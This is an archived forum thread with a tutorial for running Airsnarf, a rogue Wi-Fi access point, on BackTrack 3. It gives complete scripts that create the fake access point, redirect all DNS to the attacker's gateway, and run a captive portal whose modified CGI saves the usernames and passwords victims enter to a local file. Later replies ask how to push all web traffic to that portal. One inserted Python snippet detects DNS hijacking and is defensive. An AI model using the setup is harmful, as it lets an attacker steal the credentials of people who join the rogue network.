Remote Exploit Forums > Archives > BackTrack v2.0 Final > Tutorials & Guides

#1
12-16-2007, 02:07 AM
dapirates1
Airsnarf working on bt3 with atheros card

This guide has been put together from a number of different guides, tested on BT3, and works great. I am using a Proxim 8470-WD card.

First boot into BackTrack 3.

Make a dir in /var/www called html.
Make a dir in /var/state called dhcp.

Download dhcp-3.0.5-i486-2.tgz, then:

Code:
tar -zxvf dhcp-3.0.5-i486-2.tgz
touch /var/state/dhcp/dhcpd.leases

Next open kwrite and make a file called /etc/rc.d/rc.dhcpd.
Open the file, put this in there and save it:


Code:
#!/bin/sh
#
# /etc/rc.d/rc.dhcpd
#
# Start/stop/restart the ISC DHCP server (dhcpd).
#
# To make dhcpd start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.dhcpd
#

dhcpd_start() {
  # only start if the daemon is installed and the config is readable
  if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
    echo "Starting dhcpd..."
    /usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
  fi
}

dhcpd_stop() {
  killall dhcpd
}

dhcpd_restart() {
  dhcpd_stop
  sleep 2
  dhcpd_start
}

case "$1" in
  'start')
    dhcpd_start
    ;;
  'stop')
    dhcpd_stop
    ;;
  'restart')
    dhcpd_restart
    ;;
  *)
    # Default is "start", for backwards compatibility with previous
    # Slackware versions. This may change to a 'usage' error someday.
    dhcpd_start
    ;;
esac


Then create another file, /etc/rc.d/rc.httpd.
Open the file, put this in there, then save it:


Code:
#!/bin/sh
#
# /etc/rc.d/rc.httpd
#
# Start/stop/restart the Apache web server.
#
# To make Apache start automatically at boot, make this
# file executable: chmod 750 /etc/rc.d/rc.httpd
#
conffile=/etc/httpd/httpd.conf

function start() {
  # use the SSL-aware start target only if mod_ssl is included in the config
  if grep -q "^Include /etc/apache/mod_ssl.conf" $conffile ; then
    /usr/sbin/apachectl startssl
  else
    /usr/sbin/apachectl start
  fi
}

function stop() {
  /usr/sbin/apachectl stop
}

function restart() {
  /usr/sbin/apachectl restart
}

# See how we were called.
case "$1" in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    restart
    ;;
  *)
    echo "usage $0 start|stop|restart" ;;
esac

Make both scripts executable:

Code:
chmod 755 /etc/rc.d/rc.httpd
chmod 755 /etc/rc.d/rc.dhcpd

Go to the airsnarf directory /pentest/wireless/airsnarf, open airsnarf and replace it with this:

Code:
#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.

echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"
# here are some variables you may want to edit
WWW_ROOT="/var/www/html"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"

# specify another config dir with a command line arg if you want
if [ $1 ]
then
LOCAL_CFG="$1"
fi

source $LOCAL_CFG/airsnarf.cfg

# create the dhcpd.conf
echo -n "Creating dhcpd.conf..."
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."

# copy over the www stuff
echo -n "Building the captive portal..."
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo "Done."

# set our wireless parameters
echo -n "Setting the wireless parameters..."
ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
echo "Done."

# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig $ROGUE_INTERFACE $ROGUE_GW
route add -net 0.0.0.0 gw $ROGUE_GW
echo "Done."

# restart some services
/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
# dammit, I swear this used to work with just an OUTPUT rule...
iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
echo "Done."

# start the local dns resolver
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

Now open the cfg folder in the airsnarf directory, edit airsnarf.cfg and replace it with:

Code:
ROGUE_SSID="ap name"
ROGUE_NET="192.168.1."
ROGUE_GW="192.168.1.254"
ROGUE_INTERFACE="ath0"
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE

Now for saving to a file, /tmp/airsnarf_pwds.txt.

Open airsnarf-0.2/cfg/cgi-bin and edit airsnarf.cgi.

Comment out (or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);".

Replace it with:

Code:
open (MYFILE, '>>/tmp/airsnarf_pwds.txt');
foreach $key (keys(%FORM)) {
  print MYFILE "$key = $FORM{$key}\n";
  print MYFILE "----------------------\n";
}

Save the file.

Now run airsnarf and try to connect. You will get "It works" on screen, don't worry.
Go to /var/www/html and copy it to /var/www/htdocs. Try to connect now from a Windows box etc., then check the passwords.

Last edited by dapirates1; 12-16-2007 at 02:22 AM.
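The airsnarf script above DNATs every UDP/53 query to the rogue gateway and starts a resolver that answers every name with that address, which is also what a client on an untrusted network can test for. The following Python is an added detection example, not code from this thread or from Airsnarf: it parses a few DNS replies for unrelated canary names and flags the network when all of them resolve to the gateway (192.168.1.254 is ROGUE_GW from the cfg above; the canary names, the honest addresses and the reply bytes are constructed).

```python
import struct
from typing import Dict, List

def _skip_name(buf: bytes, pos: int) -> int:
    # Advance past a DNS name: length-prefixed labels or a 2-byte compression pointer
    while True:
        length = buf[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += 1 + length

def parse_a_records(resp: bytes) -> List[str]:
    """Return the IPv4 addresses found in the answer section of a DNS response."""
    qdcount, ancount = struct.unpack("!HH", resp[4:8])
    pos = 12                                      # fixed 12-byte header
    for _ in range(qdcount):
        pos = _skip_name(resp, pos) + 4           # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        pos = _skip_name(resp, pos)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", resp[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:             # A record
            addrs.append(".".join(str(b) for b in resp[pos:pos + 4]))
        pos += rdlen
    return addrs

def build_response(name: str, ip: str, txid: int = 0x1234) -> bytes:
    """Constructed DNS reply with one A record, standing in for a captured packet."""
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # standard response, 1 Q, 1 A
    question = qname + struct.pack("!HH", 1, 1)                  # QTYPE=A, QCLASS=IN
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + rdata  # name = pointer to Q
    return header + question + answer

def looks_like_dns_hijack(answers: Dict[str, List[str]], gateway: str, min_names: int = 3) -> bool:
    """True when every canary name resolved only to the gateway address."""
    if len(answers) < min_names:                  # too few samples to judge
        return False
    return all(ips == [gateway] for ips in answers.values())

ROGUE_GW = "192.168.1.254"                        # ROGUE_GW from the thread's airsnarf.cfg
CANARIES = ["example.com", "example.net", "example.org"]   # hypothetical canary names
# Constructed replies: a rogue resolver answers everything with the gateway; an honest one gives unrelated (documentation-range) addresses
ROGUE_ANSWERS = {n: parse_a_records(build_response(n, ROGUE_GW)) for n in CANARIES}
HONEST_ANSWERS = {n: parse_a_records(build_response(n, ip))
                  for n, ip in zip(CANARIES, ["203.0.113.10", "198.51.100.7", "192.0.2.44"])}
```

On a live client the same check would be fed by real lookups of the canary names against the DHCP-supplied resolver; any answer set in which every unrelated name maps to the gateway is the captive-portal signature this thread's setup produces.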
#2
12-19-2007, 03:54 PM
Dr_GrEeN

Why copy all the files across? Just modify:

Code:
# here are some variables you may want to edit
WWW_ROOT="/var/www/htdocs"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"
Cheers
#3
12-19-2007, 10:11 PM
dapirates1

Thanks for the info Dr_GrEeN, I have done that now. I should have noticed that, lol.
#4
12-19-2007, 10:29 PM
spankdidly

Good tut dapirates. I always loved a lil airsnarfin. Well airsnarfin at my house with my equipment.
#5
12-19-2007, 11:50 PM

This topic is useful.

I will test this after.
#6
12-26-2007, 12:59 AM

Thanks for the info. I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with an RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my Atheros card.
#7
01-25-2008, 07:48 AM

bump.
#8
02-13-2008, 02:20 AM
dapirates1

I have made this video, Airsnarfing on Backtrack 3, and also uploaded all the files needed to Rapidshare.

http://dapirates1.blip.tv/#650915

I hope it comes in handy to some of you.
#9
02-26-2008, 03:13 AM

Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer. I've been using the rausb0 device through VMWare. Anyone else in the same boat?
#10
04-06-2008, 06:22 AM

This is a fantastic guide. I followed it closely and it took a while, but things eventually worked. I have one query though: how do you make all HTML requests go to the gateway address? I got everything working just like yours, and when I connect to the rogue AP I'm not directed to anything, I just get blank pages; the only page that works is the rogue AP address. Is there any way to redirect all HTML requests to the local server? This might be an Apache thing, I've never been great with Apache.